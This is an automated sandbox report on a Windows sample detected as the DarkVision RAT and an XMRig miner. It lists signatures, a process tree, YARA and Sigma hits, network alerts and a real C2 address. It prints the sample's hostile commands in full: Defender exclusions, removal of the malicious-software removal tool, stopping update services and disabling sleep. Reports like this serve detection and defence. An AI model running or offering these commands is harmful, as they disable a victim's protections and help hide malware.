Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1570971
MD5: 05bbeba85b66e05630ab53abe2f0864e
SHA1: 5181b7d8e9ec8946ad3256b1b400e2f570dae8da
SHA256: c2ee598db573b89211027b5607fb6561742991be3b9d5ed9e413a3c3d35da01b
Tags: exe, user-Bitsight

Detection

DarkVision Rat, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4152 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 05BBEBA85B66E05630AB53ABE2F0864E)
    • cmd.exe (PID: 2848 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1468 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • explorer.exe (PID: 5020 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • WindosCPUsystem.exe (PID: 2132 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "" MD5: FD863BAB145A20D25E45177DA0E56EFC)
        • powershell.exe (PID: 7084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6448 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 5036 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4780 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1280 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4488 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2732 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6636 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2760 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7040 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 1944 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • explorer.exe (PID: 6196 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6864 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1444 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5836 cmdline: C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0} MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware configuration (DarkVision Rat): {"C2": "185.157.162.216", "Port": 5200}
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
file.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
file.exe | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x318c0:$s1: CoGetObject
  • 0x31948:$s2: Elevation:Administrator!new:

Source | Rule | Description | Author | Strings
00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security

Source | Rule | Description | Author | Strings
4.2.explorer.exe.be0000.0.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
4.2.explorer.exe.be0000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
4.2.explorer.exe.be0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x36ce8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x36c18:$s1: CoGetObject
  • 0x36cb0:$s2: Elevation:Administrator!new:
0.0.file.exe.7c0000.0.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
0.0.file.exe.7c0000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "", ParentImage: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe, ParentProcessId: 2132, ParentProcessName: WindosCPUsystem.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6636, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4152, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ProcessId: 2848, ProcessName: cmd.exe
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 5020, StartAddress: EB0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 6864
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData', ProcessId: 1468, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T15:07:33.500244+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.6 | 64191 | 1.1.1.1 | 53 | UDP
2024-12-08T15:07:07.080523+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49708 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:12.250453+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49707 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:17.220795+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:25.102418+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49738 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:25.236284+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:31.856449+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49756 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:46.373548+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49775 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:54.212031+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49804 | 154.216.20.243 | 443 | TCP
2024-12-08T15:08:10.944741+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49823 | 154.216.20.243 | 443 | TCP
2024-12-08T15:08:14.300884+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49857 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:32.539004+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.6 | 49756 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:32.823322+0100 | 2021954 | 1 | A Network Trojan was detected | 154.216.20.243 | 443 | 192.168.2.6 | 49756 | TCP
2024-12-08T15:07:37.726614+0100 | 2044697 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 154.216.20.243 | 443 | TCP
2024-12-08T15:07:05.208895+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:10.584306+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:13.260349+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49714 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:15.937042+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49721 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:18.615476+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49728 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:22.050459+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49737 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:25.184321+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49750 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:24.349906+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49882 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:30.530981+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49894 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:33.203418+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49903 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:35.870874+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49909 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:38.982183+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49916 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:41.654103+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49922 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:44.324382+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49930 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:48.823823+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:55.147311+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:57.816864+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:00.934674+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50017 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:03.604087+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50018 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:06.279386+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50019 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:08.950916+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50020 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:11:13.508924+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:07:08.889565+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:08:28.783097+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.6 | 49882 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:53.265747+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:11:17.202658+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:47.046507+0100 | 2051004 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.6 | 50012 | 154.216.20.243 | 443 | TCP
2024-12-08T15:10:42.374133+0100 | 2051004 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.6 | 50021 | 154.216.20.243 | 443 | TCP

AV Detection

Source: 4.2.explorer.exe.be0000.0.unpack | Malware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DC031 CryptReleaseContext,CryptDestroyHash,0_2_007DC031
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DC00C CryptReleaseContext,CryptDestroyHash,0_2_007DC00C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C5140 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,__snwprintf,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_007C5140
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DBF00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_007DBF00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DBFD9 CryptReleaseContext,CryptDestroyHash,0_2_007DBFD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DBFB6 CryptReleaseContext,CryptDestroyHash,0_2_007DBFB6
Source: C:\Windows\explorer.exe | Code function: 4_2_00BFDAD0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_00BFDAD0
Source: C:\Windows\explorer.exe | Code function: 4_2_00BE53B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,4_2_00BE53B0
Source: C:\Windows\explorer.exe | Code function: 4_2_00BFDBEE CryptReleaseContext,CryptDestroyHash,4_2_00BFDBEE
Source: C:\Windows\explorer.exe | Code function: 4_2_00BFDBC7 CryptReleaseContext,CryptDestroyHash,4_2_00BFDBC7
Source: C:\Windows\explorer.exe | Code function: 4_2_00BFDC2A CryptReleaseContext,CryptDestroyHash,4_2_00BFDC2A
Source: C:\Windows\explorer.exe | Code function: 4_2_00BFDC5F CryptReleaseContext,CryptDestroyHash,4_2_00BFDC5F
Source: C:\Windows\explorer.exe | Code function: 33_2_013952D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_013952D0
Source: C:\Windows\explorer.exe | Code function: 33_2_013955D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_013955D0
Source: C:\Windows\explorer.exe | Code function: 33_2_0139A4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_0139A4A0
Source: C:\Windows\explorer.exe | Code function: 33_2_01396640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_01396640
Source: C:\Windows\explorer.exe | Code function: 33_2_013949D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_013949D0
Source: C:\Windows\explorer.exe | Code function: 33_2_01399BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,33_2_01399BF0
Source: C:\Windows\explorer.exe | Code function: 33_2_01399AC0 CryptBinaryToStringW,RegGetValueW,33_2_01399AC0
Source: C:\Windows\explorer.exe | Code function: 33_2_01399D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,33_2_01399D30
Source: C:\Windows\explorer.exe | Code function: 33_2_01394CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_01394CD0
Source: C:\Windows\explorer.exe | Code function: 33_2_01394FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,33_2_01394FD0
Source: C:\Windows\explorer.exe | Code function: 33_2_01396E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,33_2_01396E70
Source: C:\Windows\explorer.exe | Code function: 33_2_0139A7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,33_2_0139A7A0
Source: C:\Windows\explorer.exe | Code function: 33_2_01399E27 CryptReleaseContext,CryptDestroyHash,33_2_01399E27
Source: C:\Windows\explorer.exe | Code function: 33_2_01395E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,33_2_01395E10
Source: C:\Windows\explorer.exe | Code function: 33_2_01393E70 CryptStringToBinaryA,33_2_01393E70
Source: C:\Windows\explorer.exe | Code function: 33_2_01399E4E CryptReleaseContext,CryptDestroyHash,33_2_01399E4E
Source: C:\Windows\explorer.exe | Code function: 33_2_01399EBF CryptReleaseContext,CryptDestroyHash,33_2_01399EBF
Source: C:\Windows\explorer.exe | Code function: 33_2_01399E8A CryptReleaseContext,CryptDestroyHash,33_2_01399E8A
Source: C:\Windows\explorer.exe | Code function: 35_2_027B52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B52D0
